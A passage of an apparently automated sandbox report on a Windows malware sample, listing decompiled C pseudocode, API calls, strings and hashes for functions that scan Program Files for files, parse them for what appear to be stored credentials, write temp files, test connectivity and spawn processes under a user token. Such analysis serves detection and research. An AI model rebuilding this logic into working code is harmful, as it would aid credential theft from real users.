					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t34 + _t30 * 4 - 0x18)), 0, 0, _t22);
					_t37 = _t22;
					if(_t22 == 0) {
						_t29 =  &_v16;
						E004170EA( &_v580,  &_v16, _t37, 1, 2, E0040F072,  &_v12, 0, 0, 0);
					}
					_t30 = _t30 + 1;
				} while (_t30 < 3);
				if(_v8 <= 0) {
					return E004119C1(_v12);
				}
				return E0040C9F4(_t29, _v12, 0xcb);
			}

0x0040f30c
0x0040f314
0x0040f31d
0x0040f327
0x0040f32e
0x0040f335
0x0040f33c
0x0040f341
0x0040f343
0x0040f343
0x0040f351
0x0040f357
0x0040f359
0x0040f36b
0x0040f374
0x0040f374
0x0040f379
0x0040f37a
0x0040f382
0x00000000
0x0040f39b
0x00000000

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008,?,00000000), ref: 0040F351

Part of subcall function 004170EA: FindFirstFileW.KERNEL32(?,?,?,?,00000000,?,80000001), ref: 00417129
Part of subcall function 004170EA: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00417150
Part of subcall function 004170EA: PathMatchSpecW.SHLWAPI(?,?), ref: 0041719A
Part of subcall function 004170EA: Sleep.KERNEL32(00000000,?,?), ref: 004171F7
Part of subcall function 004170EA: FindNextFileW.KERNEL32(?,?), ref: 00417225
Part of subcall function 004170EA: FindClose.KERNEL32(?), ref: 00417237

Part of subcall function 004119C1: HeapFree.KERNEL32(00000000,00000000,004131B8,00000000,?,?,?,00405C4E,00000000,00406128), ref: 004119D4

Strings

&, xrefs: 0040F327
#, xrefs: 0040F335

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
String ID: #$&
API String ID: 3438805939-3870246384
Opcode ID: a4cffd6df5e16610feefc4b88e8f4ec0dc60326005b9bbd734109b8de98fe9a7
Instruction ID: 075b4ceedec5918eb6651cc31aa2b988599fffd14de391f702579241efa5201b
Opcode Fuzzy Hash: a4cffd6df5e16610feefc4b88e8f4ec0dc60326005b9bbd734109b8de98fe9a7
Instruction Fuzzy Hash: 0611A0B5A01218BADB209B92DC49FDFBF78EF41714F00007AF605B6180D2785B8ACBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00406954, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00406954(void* __eflags) {
				signed int _v8;
				char _v20;
				char _v44;
				char _v92;
				void* __edi;
				void* __esi;
				void* _t17;
				CHAR* _t27;
				intOrPtr* _t28;
				WCHAR* _t30;
				struct HINSTANCE__* _t31;

				_t30 =  &_v44;
				E00419DD3(0xe3, _t30);
				_t31 = GetModuleHandleW(_t30);
				if(_t31 != 0) {
					_t27 =  &_v20;
					E00419D9D(0xe4, _t27);
					_t28 = GetProcAddress(_t31, _t27);
					if(_t28 == 0) {
						L4:
						_t17 = 0;
						L6:
						return _t17;
					}
					_v8 = _v8 & 0x00000000;
					_t32 =  &_v92;
					E00419DD3(0xd5,  &_v92);
					_push(0x1e6);
					_push("0xA8660B2A");
					if(E0041272F( &_v8, _t32, 0x3030303) > 0) {
						 *_t28(0, _v8, "#", 0x10040);
						E004119C1(_v8);
						_t17 = 1;
						goto L6;
					}
					goto L4;
				}
				return 0;
			}

0x0040695b
0x00406963
0x00406971
0x00406975
0x0040697c
0x00406984
0x00406993
0x00406997
0x004069cc
0x004069cc
0x004069eb
0x00000000
0x004069eb
0x00406999
0x0040699d
0x004069a5
0x004069aa
0x004069af
0x004069ca
0x004069df
0x004069e4
0x004069e9
0x00000000
0x004069e9
0x00000000
0x004069ca
0x00000000

APIs

GetModuleHandleW.KERNEL32(?), ref: 0040696B
GetProcAddress.KERNEL32(00000000,?), ref: 0040698D

Strings

0xA8660B2A, xrefs: 004069AF

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: 0xA8660B2A
API String ID: 1646373207-761630507
Opcode ID: 8871f7cd047d6d84aa7cd9a0bc34efabd49865e1ba405e0615317d7c02e9e125
Instruction ID: 2b23eb0bc887a5fa6e7a7b939be7cf67a5b0923af1fe516493645017eb86d32b
Opcode Fuzzy Hash: 8871f7cd047d6d84aa7cd9a0bc34efabd49865e1ba405e0615317d7c02e9e125
Instruction Fuzzy Hash: F601F5B6A00254B7CB117BA68C06BCF7B6C9B40715F010076FD02F7281CA78DE4585A9

Uniqueness

Uniqueness Score: -1.00%

Function 00416D3D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00416D3D(intOrPtr _a4, intOrPtr _a8) {
				short _v524;
				char _v1044;
				void* __edi;
				void* _t12;
				void* _t20;
				void* _t21;

				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
					L6:
					return 0;
				}
				_t20 = 0;
				while(1) {
					_push(_a4);
					_push(E00412CFA());
					_push(L"tmp");
					_t19 =  &_v1044;
					_t12 = E004126B4(_t11, 0x104,  &_v1044, L"%s%08x.%s");
					_t21 = _t21 + 0x10;
					if(_t12 == 0xffffffff) {
						goto L6;
					}
					if(E00417246(_t19, _a8,  &_v524) == 0 || E00416B71(_a8, 0, 0) == 0) {
						_t20 = _t20 + 1;
						if(_t20 < 0x64) {
							continue;
						}
						goto L6;
					} else {
						return 1;
					}
				}
				goto L6;
			}

0x00416d60
0x00416dba
0x00000000
0x00416dba
0x00416d62
0x00416d64
0x00416d64
0x00416d6c
0x00416d6d
0x00416d7c
0x00416d82
0x00416d87
0x00416d8d
0x00000000
0x00000000
0x00416da2
0x00416db4
0x00416db8
0x00000000
0x00000000
0x00000000
0x00416dc2
0x00000000
0x00416dc2
0x00416da2
0x00000000

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 00416D54

Part of subcall function 00412CFA: GetTickCount.KERNEL32 ref: 00412CFA

Part of subcall function 00417246: PathCombineW.SHLWAPI(00405D8B,00405D8B,?,00405D8B,?,?), ref: 00417265

Part of subcall function 00416B71: CreateFileW.KERNEL32(0041349B,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,00416DB0,0041349B,00000000,00000000,0041349B,?), ref: 00416B8B
Part of subcall function 00416B71: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00416DB0,0041349B,00000000,00000000,0041349B,?), ref: 00416BAE
Part of subcall function 00416B71: CloseHandle.KERNEL32(00000000,?,00416DB0,0041349B,00000000,00000000,0041349B,?), ref: 00416BBB

Strings

tmp, xrefs: 00416D6D
%s%08x.%s, xrefs: 00416D72

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePath$CloseCombineCountCreateHandleTempTickWrite
String ID: %s%08x.%s$tmp
API String ID: 3395140874-234517578
Opcode ID: 4076a5ce9fbffcfe374d66e7aed3f183fb4f4f4cf0d5fa87cc587a9cace22262
Instruction ID: ba6b453534db589e838a02ba1f33eb9fb75867dd315a44fcbe3885935b65886f
Opcode Fuzzy Hash: 4076a5ce9fbffcfe374d66e7aed3f183fb4f4f4cf0d5fa87cc587a9cace22262
Instruction Fuzzy Hash: 9901263220021426DF207A14EC06BEF776DEB12329F104173FE65A62E1C279CDD6969C

Uniqueness

Uniqueness Score: -1.00%

Function 00415595, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00415595(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v524;
				void* __esi;
				WCHAR* _t17;
				intOrPtr _t25;
				int _t27;

				_t27 = 0;
				if(GetTempFileNameW(_a12 + 0x746, L"cab", 0,  &_v524) != 0 && E00416D1C( &_v524) != 0) {
					_t17 = PathFindFileNameW( &_v524);
					_t25 = _a4;
					E00411B40(_a8 + 0xfffffffd | 0xffffffff, _t17, _t25 + 3, 0, _a8 + 0xfffffffd);
					E004119FD(_t25, "?T", 2);
					 *((char*)(_t25 + 2)) = 0x5c;
					_t27 = 1;
				}
				return _t27;
			}

0x004155a9
0x004155bf
0x004155d9
0x004155df
0x004155f3
0x00415600
0x00415607
0x0041560b
0x0041560c
0x00415611

APIs

GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 004155B7

Part of subcall function 00416D1C: SetFileAttributesW.KERNEL32(00000080,00000080,00407338,?), ref: 00416D25
Part of subcall function 00416D1C: DeleteFileW.KERNEL32(?), ref: 00416D2F

PathFindFileNameW.SHLWAPI(?,?,?), ref: 004155D9

Part of subcall function 00411B40: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00412838,00000000,00000000,00000000,00411B9D,00000000,00000000,00000000,?,00000000), ref: 00411B5B

Strings

cab, xrefs: 004155AC

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Name$AttributesByteCharDeleteFindMultiPathTempWide
String ID: cab
API String ID: 2491076439-1787492089
Opcode ID: af676cb200cca581294be78dea20f02541230fe462298c14caf1af194cee1762
Instruction ID: 5a1c857c2f397988f01a23b915af38b9c82897f342a914d12cdad1500640b7f8
Opcode Fuzzy Hash: af676cb200cca581294be78dea20f02541230fe462298c14caf1af194cee1762
Instruction Fuzzy Hash: 2301D676A0031467CB109B69DC4AFCBBBAC9F44B60F0043627A69F31D2D778E944CAE4

Uniqueness

Uniqueness Score: -1.00%

Function 0041C499, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0041C499(void* __ecx, void* __esi, void* _a4, void* _a8, void* _a12, intOrPtr _a16) {
				void* _t13;
				void** _t24;
				void* _t27;

				_t13 = _a4(_a8,  &_a8);
				if(_t13 != 0) {
					_t24 = E004150B0(__ecx, _a8);
					if(_t24 != 0) {
						if(EqualSid( *_t24, _a12) != 0) {
							_t27 = _a8;
							if(E0041272F( &_a4, L"\"%s\"", _a16) > 0) {
								E004132E3(_t27, _a4);
								E004119C1(_a4);
							}
						}
						E004119C1(_t24);
					}
					return CloseHandle(_a8);
				}
				return _t13;
			}

0x0041c4a3
0x0041c4a8
0x0041c4b3
0x0041c4b7
0x0041c4c6
0x0041c4cc
0x0041c4e2
0x0041c4e8
0x0041c4f0
0x0041c4f0
0x0041c4f5
0x0041c4f7
0x0041c4f7
0x00000000
0x0041c505
0x0041c507

APIs

Part of subcall function 004150B0: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000000,00000000,?,?,00412FFA,?,?,?,00406161,000000FF,00422540), ref: 004150C9
Part of subcall function 004150B0: GetLastError.KERNEL32(?,?,00412FFA,?,?,?,00406161,000000FF,00422540,?,?,00000000), ref: 004150CF
Part of subcall function 004150B0: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,?,00412FFA,?,?,?,00406161,000000FF,00422540), ref: 004150F5

EqualSid.ADVAPI32(00000000,00000000,?,00000000,?,0041C5F3,00000000,?,?,?), ref: 0041C4BE

Part of subcall function 004132E3: LoadLibraryA.KERNEL32(userenv.dll,00000000), ref: 004132F4
Part of subcall function 004132E3: GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 00413313
Part of subcall function 004132E3: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 0041331F
Part of subcall function 004132E3: CreateProcessAsUserW.ADVAPI32(?,00000000,0041C4ED,00000000,00000000,00000000,0041C4ED,0041C4ED,00000000,?,?,?,00000000,00000044), ref: 00413390
Part of subcall function 004132E3: CloseHandle.KERNEL32(?), ref: 004133A3
Part of subcall function 004132E3: CloseHandle.KERNEL32(?), ref: 004133A8
Part of subcall function 004132E3: FreeLibrary.KERNEL32(?), ref: 004133BF

Part of subcall function 004119C1: HeapFree.KERNEL32(00000000,00000000,004131B8,00000000,?,?,?,00405C4E,00000000,00406128), ref: 004119D4

CloseHandle.KERNEL32(?,?,00000000,?,0041C5F3,00000000,?,?,?), ref: 0041C4FF

Strings

"%s", xrefs: 0041C4D2

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$AddressFreeInformationLibraryProcToken$CreateEqualErrorHeapLastLoadProcessUser
String ID: "%s"
API String ID: 4035272744-3297466227
Opcode ID: 473bf4285a279e5dc8a085de0739f2076f3f82945a3032696d8c43c0fabdd85c
Instruction ID: 42264e16f4f2fa84f0012acf87d864ab188ed6234e71e7f079b6a21fe7ec7148
Opcode Fuzzy Hash: 473bf4285a279e5dc8a085de0739f2076f3f82945a3032696d8c43c0fabdd85c
Instruction Fuzzy Hash: E2F06D75100109BBCF116F26EC55EDF3F69AF40390B008036FD18A5221DB36DAA0DBAC

Uniqueness

Uniqueness Score: -1.00%

Function 00413A8A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00413A8A(intOrPtr __eax) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char* _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				void* __edi;
				intOrPtr _t26;

				_t26 = 0;
				_v56 = 0x101;
				_v52 = 0;
				_v48 = __eax;
				_v44 = E00413A09();
				_v40 = "http://www.google.com/webhp";
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0x80000;
				_v12 = 0;
				asm("clc");
				_v8 = GetTickCount();
				if(E004138D7( &_v56, 0) != 0) {
					_t26 = GetTickCount() - _v8;
				}
				E004119C1(_v44);
				return _t26;
			}

0x00413a92
0x00413a95
0x00413a9b
0x00413a9e
0x00413aac
0x00413aaf
0x00413ab6
0x00413ab9
0x00413abc
0x00413abf
0x00413ac2
0x00413ac5
0x00413acc
0x00413ace
0x00413ad5
0x00413adf
0x00413ae5
0x00413ae5
0x00413aeb
0x00413af6

APIs

Part of subcall function 00413A09: LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 00413A1A
Part of subcall function 00413A09: GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 00413A2D
Part of subcall function 00413A09: FreeLibrary.KERNEL32(?), ref: 00413A7F

GetTickCount.KERNEL32 ref: 00413ACF

Part of subcall function 004138D7: WaitForSingleObject.KERNEL32(?,?,?,?,00000000), ref: 0041392B
Part of subcall function 004138D7: InternetCloseHandle.WININET(00000000), ref: 004139C4

GetTickCount.KERNEL32 ref: 00413AE1

Strings

http://www.google.com/webhp, xrefs: 00413AAF

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CountLibraryTick$AddressCloseFreeHandleInternetLoadObjectProcSingleWait
String ID: http://www.google.com/webhp
API String ID: 2673491915-2670330958
Opcode ID: 135f4f5165967e31bc5e6405accfa33476e4a5e2f92baf92c1b507c2020d35a6
Instruction ID: 6667749a8a186ab824bc74c6fb61b57b2bd469dbe3bef38431f3c4bb1912175b
Opcode Fuzzy Hash: 135f4f5165967e31bc5e6405accfa33476e4a5e2f92baf92c1b507c2020d35a6
Instruction Fuzzy Hash: 9401E8B1D11228AACF00EFE9D9444CEFFB8AF08758F10416BE900B7211D7B85A458BD8

Uniqueness

Uniqueness Score: -1.00%

Function 00408B13, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00406473: WaitForSingleObject.KERNEL32(00000000,0041D5FF,743C152E,00000002), ref: 0040647B

GetCurrentThreadId.KERNEL32 ref: 00408B46
GetWindowThreadProcessId.USER32(?,00000000), ref: 00408B50

Strings

x>B, xrefs: 00408B36

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$CurrentObjectProcessSingleWaitWindow
String ID: x>B
API String ID: 419583955-2092227387
Opcode ID: 95b02a5921195f782d90f7a0317501b8258145dad62e3e28a56f1570bd2d2e04
Instruction ID: 10a78e645fd93681e8a66568c96388f29e7a526c2236b87dfecb00d338db2266
Opcode Fuzzy Hash: 95b02a5921195f782d90f7a0317501b8258145dad62e3e28a56f1570bd2d2e04
Instruction Fuzzy Hash: F8F08962A011217AC2201AA67A88C97BB68DAA67F5355043FF284B22519A38540185BD

Uniqueness

Uniqueness Score: -1.00%

Function 00408BBD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408BBD(void* __eax) {
				void* __ebx;
				long _t8;
				intOrPtr _t16;
				struct HWND__* _t19;

				if(__eax + 0x422586 == 0 || E00406473() == 0) {
					return GetCapture();
				}
				_t8 = GetCurrentThreadId();
				_t16 =  *0x423e88;
				if( *((intOrPtr*)(_t16 + 0x10c)) != _t8) {
					L6:
					return 0;
				} else {
					_t19 =  *(_t16 + 0x108);
					if(_t19 == 0 || IsWindow(_t19) != 0) {
						return _t19;
					} else {
						E0040824F(0, 0x423e78, _t11, _t11, _t11);
						goto L6;
					}
				}
			}

0x00408bc4
0x00408c12
0x00408c12
0x00408bcf
0x00408bd5
0x00408be1
0x00408c09
0x00408c0c
0x00408be3
0x00408be3
0x00408beb
0x00408c10
0x00408bf8
0x00408c03
0x00000000
0x00408c08
0x00408beb

APIs

Part of subcall function 00406473: WaitForSingleObject.KERNEL32(00000000,0041D5FF,743C152E,00000002), ref: 0040647B

GetCurrentThreadId.KERNEL32 ref: 00408BCF
IsWindow.USER32(?), ref: 00408BEE

Part of subcall function 0040824F: WaitForSingleObject.KERNEL32(?,000000FF,74EDA660,00408688,00000000), ref: 00408255
Part of subcall function 0040824F: ReleaseMutex.KERNEL32(?), ref: 00408289
Part of subcall function 0040824F: IsWindow.USER32(?), ref: 00408290
Part of subcall function 0040824F: PostMessageW.USER32(?,00000215,00000000,?), ref: 004082AA

Strings

x>B, xrefs: 00408BFE

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSingleWaitWindow$CurrentMessageMutexPostReleaseThread
String ID: x>B
API String ID: 904989000-2092227387
Opcode ID: fa60bb6c101bfaebf1cf7175f4abfc3b161c2906a21c61d5a9bc2c004b075ddc
Instruction ID: 24aaaf3b7468e9ae223df288cd10b8b37631397046dab6c6cb3ea8fa1b625237
Opcode Fuzzy Hash: fa60bb6c101bfaebf1cf7175f4abfc3b161c2906a21c61d5a9bc2c004b075ddc
Instruction Fuzzy Hash: 69F0A7326090205BEA10AFA57F849A773249B5074574D40BFE985F6261DB3D4C8259FC

Uniqueness

Uniqueness Score: -1.00%

Function 00408B6D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408B6D(void* __eax, void* __ecx) {
				void* __ebx;
				void* __esi;

				if(E00406473() == 0) {
					return ReleaseCapture();
				}
				if( *((intOrPtr*)( *0x423e88 + 0x10c)) != GetCurrentThreadId()) {
					SetLastError(5);
					return 0;
				} else {
					E0040824F(0, 0x423e78, 0, 0, 0);
					return 1;
				}
			}

0x00408b7c
0x00408bb6
0x00408bb6
0x00408b90
0x00408bad
0x00408bb5
0x00408b92
0x00408ba0
0x00408baa
0x00408baa

APIs

Part of subcall function 00406473: WaitForSingleObject.KERNEL32(00000000,0041D5FF,743C152E,00000002), ref: 0040647B

GetCurrentThreadId.KERNEL32 ref: 00408B7E
SetLastError.KERNEL32(00000005), ref: 00408BAD

Part of subcall function 0040824F: WaitForSingleObject.KERNEL32(?,000000FF,74EDA660,00408688,00000000), ref: 00408255
Part of subcall function 0040824F: ReleaseMutex.KERNEL32(?), ref: 00408289
Part of subcall function 0040824F: IsWindow.USER32(?), ref: 00408290
Part of subcall function 0040824F: PostMessageW.USER32(?,00000215,00000000,?), ref: 004082AA

Strings

x>B, xrefs: 00408B9B

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSingleWait$CurrentErrorLastMessageMutexPostReleaseThreadWindow
String ID: x>B
API String ID: 2244431463-2092227387
Opcode ID: 787ea913234f6a13e8650b99f765dce53eb196ae70396454707b3e4c8f03d3e0
Instruction ID: 2d709ef51a9e34845efab676d515b492a8e645f74174018df3df49de073cc0cc
Opcode Fuzzy Hash: 787ea913234f6a13e8650b99f765dce53eb196ae70396454707b3e4c8f03d3e0
Instruction Fuzzy Hash: 50E0D8B16001106FD700AFB0AE809B33368EBA5316B5544BEF485F5161DB7D8C01897C

Uniqueness

Uniqueness Score: -1.00%

Function 00415A7D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00415A7D(signed char* __esi, long _a4, _Unknown_base(*)()* _a8, char _a12) {
				void* _t9;

				if( *__esi < 0x40) {
					if(_a8 == 0) {
						L6:
						return 1;
					}
					_t2 =  &_a12; // 0x422428
					_t9 = CreateThread(0, _a4, _a8,  *_t2, 0, 0);
					if(_t9 == 0) {
						L2:
						return 0;
					}
					__esi[4 + ( *__esi & 0x000000ff) * 4] = _t9;
					 *__esi =  *__esi + 1;
					goto L6;
				}
				SetLastError(0x9b);
				goto L2;
			}

0x00415a80
0x00415a96
0x00415abd
0x00000000
0x00415abd
0x00415a9c
0x00415aaa
0x00415ab2
0x00415a8d
0x00000000
0x00415a8d
0x00415ab7
0x00415abb
0x00000000
0x00415abb
0x00415a87
0x00000000

APIs

SetLastError.KERNEL32(0000009B,00406914,00000000,0040A2E5,00000000,00422428,00000000,00000104,7519F560,00000000), ref: 00415A87
CreateThread.KERNEL32 ref: 00415AAA

Strings

($B, xrefs: 00415A9C

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateErrorLastThread
String ID: ($B
API String ID: 1689873465-2686783312
Opcode ID: cdd5ebe7c2a2bc4f48ac195679477be46a3e3bef5521a245b7fb0a8184c94c3b
Instruction ID: 8ece5e0666ce7c978b8b271948b13384d930cf9680fa5f9d6c3a1653e7dd2f3f
Opcode Fuzzy Hash: cdd5ebe7c2a2bc4f48ac195679477be46a3e3bef5521a245b7fb0a8184c94c3b
Instruction Fuzzy Hash: 7AE09234188341EADB258F609A44BA6BFE06F8EB41F14485EF3C1261E0C3794484DBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00416CF5, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON

Download Yara Rule

APIs

GetFileSizeEx.KERNEL32(bxA,bxA,?,?,?,00417862,00000000), ref: 00416D01

Strings

bxA, xrefs: 00416CFA, 00416CFD
bxA, xrefs: 00416CFE

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: FileSize
String ID: bxA$bxA
API String ID: 3433856609-2174343480
Opcode ID: 5f0a4832a05c3cccab329472e8a5f3abf7800f5ecc49318a7a127592a859c1d9
Instruction ID: 381c4df682255645357ea4338af2c18d70994b2a5acd560f8039388629e13d76
Opcode Fuzzy Hash: 5f0a4832a05c3cccab329472e8a5f3abf7800f5ecc49318a7a127592a859c1d9
Instruction Fuzzy Hash: 25D05E75700108BB9B14CB69DC41DDE7BBDAB45360B218221F51196290D7B0EE418AA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040F072, Relevance: 5.2, APIs: 4, Instructions: 197
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040F072(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				char _v524;
				char _v576;
				char _v580;
				char _v588;
				intOrPtr _v608;
				char _v612;
				char _v620;
				char _v628;
				char _v632;
				char* _v640;
				signed int _v644;
				char* _v648;
				char** _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				char* _v664;
				char* _v668;
				char* _v672;
				char* _v676;
				void* __edi;
				void* __esi;
				signed int _t84;
				char* _t85;
				intOrPtr _t87;
				char** _t103;
				char* _t114;
				char* _t123;
				char* _t124;
				void* _t125;
				char* _t128;
				char* _t129;
				intOrPtr* _t133;
				signed char* _t148;
				char* _t157;
				void* _t158;
				intOrPtr* _t162;
				signed int _t168;
				char* _t169;
				char** _t170;
				intOrPtr _t172;
				char* _t173;
				signed int _t174;
				void* _t176;

				_t148 = __edx;
				_t176 = (_t174 & 0xfffffff8) - 0x294;
				if(E00417246( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L32:
					return 1;
				}
				_t179 =  *__edx & 0x00000010;
				if(( *__edx & 0x00000010) == 0) {
					_push( &_v524);
					_t84 = 2;
					_t85 = E00416BD6(_t84,  &_v524,  &_v612);
					__eflags = _t85;
					if(_t85 == 0) {
						goto L32;
					}
					_t87 = E0041225C(_v608,  &_v652, _v612, 1, 0);
					_v660 = _t87;
					__eflags = _t87 - 0xffffffff;
					if(_t87 == 0xffffffff) {
						L31:
						E00416C7E( &_v612);
						goto L32;
					}
					_v640 = E00411991(0x622);
					E00419D9D(0x91,  &_v588);
					E00419D9D(0x92,  &_v628);
					E00419D9D(0x93,  &_v620);
					E00419D9D(0x94,  &_v576);
					__eflags = _v640;
					if(_v640 == 0) {
						L30:
						E004119C1(_v640);
						E004119DD(_v652, _v656);
						goto L31;
					}
					_v644 = 0;
					__eflags = _v648;
					if(_v648 <= 0) {
						goto L30;
					}
					do {
						_t168 = _v644;
						_t103 = _v652;
						__eflags =  *(_t103 + _t168 * 4);
						if( *(_t103 + _t168 * 4) == 0) {
							goto L29;
						}
						_v664 = StrStrIA( *(_t103 + _t168 * 4),  &_v588);
						_t157 = StrStrIA( *(_v656 + _t168 * 4),  &_v632);
						_v668 = StrStrIA( *(_v660 + _t168 * 4),  &_v628);
						_t114 = StrStrIA( *(_v664 + _t168 * 4),  &_v588);
						__eflags = _v676;
						_t169 = _t114;
						if(_v676 == 0) {
							goto L29;
						}
						__eflags = _v672;
						if(_v672 == 0) {
							goto L29;
						}
						__eflags = _t169;
						if(_t169 == 0) {
							goto L29;
						}
						_v676 =  &(_v676[8]);
						_v672 =  &(_v672[6]);
						_t170 =  &(_t169[0xa]);
						_v652 = _t170;
						E0040F058();
						E0040F058();
						E0040F058();
						__eflags = _t157;
						if(_t157 == 0) {
							L16:
							_t158 = 0x15;
							__eflags =  *_v676;
							if( *_v676 == 0) {
								goto L29;
							}
							__eflags =  *_v672;
							if( *_v672 == 0) {
								goto L29;
							}
							_t123 =  *_t170;
							__eflags = _t123;
							if(_t123 == 0) {
								goto L29;
